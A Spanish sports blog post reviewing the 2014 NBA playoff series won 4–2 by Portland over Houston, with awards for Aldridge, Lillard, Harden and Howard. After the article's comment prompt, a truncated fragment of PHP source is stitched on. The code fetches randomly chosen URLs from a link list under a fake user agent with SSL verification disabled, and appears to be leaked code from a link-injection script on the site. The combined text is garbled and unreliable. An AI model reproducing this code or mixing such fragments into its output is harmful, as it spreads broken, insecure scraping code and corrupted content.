Playoffs 2014: Resumen Houston 2 – Blazers 4

03 de May de 2014 por TheDeerHunter

La eliminatoria del Oeste que antes acabó. Sólo 6 partidos pero 3 de ellos disputados a 56 minutos y únicamente uno resuelto por una diferencia mayor a 5 puntos.

Sonará a excusa pero lo cierto es que los Rockets partían como favoritos para la mayoría de analistas, teniendo en cuenta además que los precedentes se inclinaban a su favor. Nuestro gran error, seguramente, fue predecir una fortaleza en casa que no ha existido, al menos durante la primera mitad de la serie.

Como hemos dicho muchas veces un pronóstico al final es una simple apuesta. Lo relevante son las razones que han llevado a decidir por esa apuesta. En este caso resulta particularmente ilustrativo las sutiles diferencias entre el análisis que hicimos en Octubre y que prácticamente clavamos con este resultado, frente a la previa que dibujamos hace dos semanas.
Fuimos bastante a contracorriente en su día, augurando una eliminación en primera ronda para un equipo que pretendía convertirse en aspirante tras haber añadido a Dwight Howard al equipo de James Harden. Nuestra principal duda tenía que ver con su capacidad defensiva y su relativa unidimensionalidad ofensiva, factores que rara vez han beneficiado a nadie en un playoff a cara de perro. Según nuestro punto de vista, los Rockets, únicamente con el cambio Asik-Howard, no lograban corregir los defectos que ya le hicieron tropezar a las primeras de cambio el curso pasado.

En el fondo si al final le dábamos mayor crédito es porque en frente teníann un espejo que reflejaba sus virtudes y defectos con pequeños matices. Rockets y Blazers han encajado 111.7 y 112 puntos por partido respectivamente, una auténtica barbaridad a pesar de las prórrogas. En medio de esta ruleta rusa ha dado la sensación que conviene más tener un Aldridge y un Lillard que un Howard y un Harden. Es evidente que no es a los favoritos Rockets a quien más le convenía el caos, como tampoco el ritmo frenético del juego.

Decíamos que si alguno lograba encontrar una defensa decente tendría mucho ganado. Es obvio que nadie lo ha conseguido globalmente pero los Blazers, vía Wes Matthews principalmente, sí han logrado poner en graves dificultades a James Harden. McHale, en cambio, a pesar de tener que renunciar a Terrence Jones por Asik apenas incordió medianamente a LaMarcus. En un duelo tan igualado son pequeños detalles que bien valen una semifinal de conferencia.

PREMIOS

MVP: LaMarcus Aldridge. Realmente ha sido el principal factor desequilibrante. El primero en hacer variar el plan de sus rivales. Pobre Terrence Jones, demasiado verde para lidiar con semejante morlaco. 30 puntos por partido, 11 rebotes, casi 3 tapones y 2 asistencias. Números a la altura de su fabulosa temporada y el mejor jugador de esta primera ronda.

Sorpresa: No ponemos ni una pizca de duda sobre las cualidades mostradas alguna vez por Damian Lillard. Simplemente nos resulta inaudito el carácter y el instinto asesino de un jugador de segundo año. 25.5 ppp, más de 6 rebotes, casi 7 asistencias, y casi 1 robo y medio. Por si faltaba algo la canasta del año.

Decepción: Pudo haber redención en el último partido de la serie pero no hubo suerte. Ridículos porcentajes de acierto de un James Harden habitualmente superado por las circunstancias. Lamentablemente no es la primera vez que le sucede. ¿Sospechoso habitual? ¿Seguirá mucho tiempo vigente eso de que es el mejor escolta de la liga? Por lo demás Kevin McHale también queda muy señalado.

Esfuerzo en vano: Al contrario de lo que muchos esperábamos tras algunas temporadas de sinsabores Dwight Howard ha vuelto a ser esa fuerza de la naturaleza tan difícil de contrarrestar. Probablemente no le ha beneficiado el escenario táctico. Aún así se va de vacaciones habiendo promediado alrededor de un 26-14, más casi 3 tapones y 2 asistencias. Pocos peros a su rendimiento.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>